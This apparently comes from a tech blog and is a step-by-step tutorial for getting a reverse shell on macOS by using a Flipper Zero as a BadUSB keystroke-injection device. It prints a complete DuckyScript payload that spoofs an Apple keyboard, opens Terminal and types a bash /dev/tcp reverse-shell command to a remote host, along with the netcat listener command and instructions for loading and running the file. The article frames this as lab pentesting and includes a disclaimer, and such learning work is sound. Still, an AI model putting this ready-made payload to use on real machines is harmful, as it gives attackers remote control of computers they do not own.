Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server I was able to gain a shell on my fully patched, up-to-date Ventura macOS computer.

\
In my lab environment, I use Flipper Zero as a pentesting device to test vulnerabilities in my servers and desktop systems.

\
The Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu selection tool, and uses a progress display to provide feedback.

\
> This article is an example of how to use the Flipper Zero as an Ethical Pentesting BadUSB device and how to avoid becoming a victim of such an exploit.  Do not use this on computers that you do not own or have permission to use.   This code does not make an effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, Firewalls, or Anti-Virus (AV) software.

## BadUSB Payloads

The Flipper Zero BadUSB as well as several other BadUSB devices use payloads written in DuckyScript.  A simple scripting language for performing keystrokes resulting in a keyboard injection attack.

\
A good starting reference point for Duckyscript Payloads is the Official Hak5 website:

__<https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky>__.  Here you will find examples and documentation for using DuckScript.

## Let’s Write Some DuckyScript

You can use a ready-made script, or you can learn to write your own. We’ll show you how to exploit a reverse shell on a macOS computer in a simple step-by-step walkthrough.

\
Use your favorite text editor and enter the following text. The macOS has the TextEdit application installed by default, so we’ll use that.

\
`ID 05ac:021e Apple:Keyboard `

`DELAY 1000 `

`GUI SPACE `

`DELAY 200 `

`STRING terminal `

`DELAY 200 `

`ENTER `

`DELAY 1000 `

`STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 `

`DELAY 1000 `

`ENTER `

`DELAY 1000`

\
For this walkthrough we don’t need to know a lot about DuckyScript, so we’ll go over the few commands that our script uses.  There are really only six different commands that we use.

| Command | Description |
|----|----|
| ID 05ac:021e Apple:Keyboard | This line tells the macOS our Flipper Zero is really an Apple Keyboard.  If you do not use this line, the macOS displays the Keyboard Setup Assistant dialog which will cause your script to fail. |
| DELAY | This command instructs the operating system to wait for a period of time.  If we don’t use these delays, the script will run too fast and fail. |
| GUI SPACE | Presses the Apple Command key and the Space bar to open the ‘Spotlight Search’ window. |
| STRING Terminal | Enters the string ‘Terminal’ into the Spotlight Search window |
| ENTER | Presses the ENTER or Return key on your keyboard.  After pressing the ENTER key, the macOS launches the Terminal window (/Applications/Utilities/Terminal) |
| STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 | This command enters the text into the terminal window which establishes a connection to the Netcat server listening at 10.10.10.157 on Port 4444 |

\
Change the IP address at **10.10.10.157** and  Port **4444** to your server’s IP address and port.

\
Save this file to your disk as **rev_shell_macos.txt**.  There is no subdirectory organization under the **badusb** directory on the Flipper Zero so if you are using multiple payloads for different operating systems,  use a naming convention that means something to you so you know what it does.

## Installing the qflipper Application

If you haven’t installed the qflipper application yet, go to the Official Flipper Zero update page and select the installer for your operating system.  The page is the firmware update page, but at the bottom are links to install the qflipper application.

\
<https://flipperzero.one/update>

[https://flipperzero.one/update?embedable=true](https://flipperzero.one/update?embedable=true)

Follow the instructions for your operating system to install the qflipper application.

\
## Getting the Duckyscript Onto the Flipper Zero

Open the qflipper application and select the folder icon highlighted in red.

\
 ![](https://cdn.hackernoon.com/images/-b3a3tme.png)

Select and double-click the **SD Card** icon to view the contents.

\
 ![](https://cdn.hackernoon.com/images/-ejc3tdn.png)

\
Locate and drag the **rev_shell_macos.txt** file we created earlier onto the **badusb** folder.

\
 ![](https://cdn.hackernoon.com/images/-en93tei.png)

\
Remove the Flipper Zero from your computer when the file is done copying.

## Waiting for a Reverse Shell

The Flipper Zero BadUSB is armed and ready to use.  But first, we need to set up our remote listener on our server.  On our Ubuntu server, start the Netcat listener with the following command:

\
`$ nc -nlvp 4444`

\
The breakdown of the command is listed in the following table.  Again you don’t really need to know what’s going on using this command, other than it’s waiting for an incoming connection.

| Command | Description |
|----|----|
| **nc** | Netcat command |
| **-nlvp** | (**n**) no DNS resolution, (**l**) listen for incoming connection, (**v**) verbose output, (**p**) port |
| **4444** | Port number to listen on |

\
\
 ![](https://cdn.hackernoon.com/images/-r0a3tsx.png)

Now that our Netcat listener  is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack.

## Starting the BadUSB Reverse Shell

The hard part is done.  The Flipper Zero BadUSB **reverse_shell_macos.txt** file is written,  moved to the Flipper Zero, and the Netcat listener is waiting for a connection.

\
Locate the Bad USB menu and select the Run button.  Do not connect your Flipper Zero to your computer just yet.  The Flipper Zero will let you know when it’s time to connect your device.

\
 ![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-4la3tbw.png)

Navigate to the DuckyScript file we copied in the previous step.  If you don’t see this file then you copied it to the wrong directory or did not use the .txt filename extension.  Select **rev_shell_macos** and click the Run button.

\
 ![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-h3b3tcy.png)

When you see the **Connect to USB** alert, you can connect your Flipper Zero to your iMac or MacBook’s USB port.  Click the Run button.

\
 ![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-cgc3trn.png)

You can watch the progress of your BadUSB script in the main window. Once the status reaches 100% the payload is complete and you can remove the Flipper Zero.

\
 ![](https://cdn.hackernoon.com/images/1yeuFftUzKRT5YTxuVLPKYa7Uep2-24d3tsc.png)

If you are watching the iMac’s computer’s monitor you can see the exploit as it executes the DuckyScript.  The Netcat listener on our Ubuntu server displays the results of the successful request.

## Control of your Computer

You now have control of the macOS computer through a reverse shell.  Running on a version of BSD Linux, you can use Unix command line tools and a BASH shell as if you were sitting at the physical iMac’s keyboard.

\
 ![](https://cdn.hackernoon.com/images/-2fc3tpp.png)

You can use regular Linux commands like **whoami**, **pwd**, **ls**, or **cd** to navigate the filesystem and manipulate the operating system.

\
 ![](https://cdn.hackernoon.com/images/-cdg3tid.png)

## Next Steps

Now that you have an understanding of how the Flipper Zero operates as a BadUSB device you can create your own scripts.  Use the Hak5 site or one of the many DuckyScript GitHub repositories available through a Google search as a starting point for your own Duckyscript files.

\
Operate legally and ethically.  Use this tool on devices that you own or have permission to use.

Apple

Different

Google

 Linux and Cybersecurity Writing

Technical Writer

Too Long; Didn't Read

Cassandra Forward a free Cassandra-focused community event

How to Get a Reverse Shell on macOS Using A Flipper Zero as a BadUSB

Too Long; Didn't Read

Companies Mentioned

@fatman

RELATED STORIES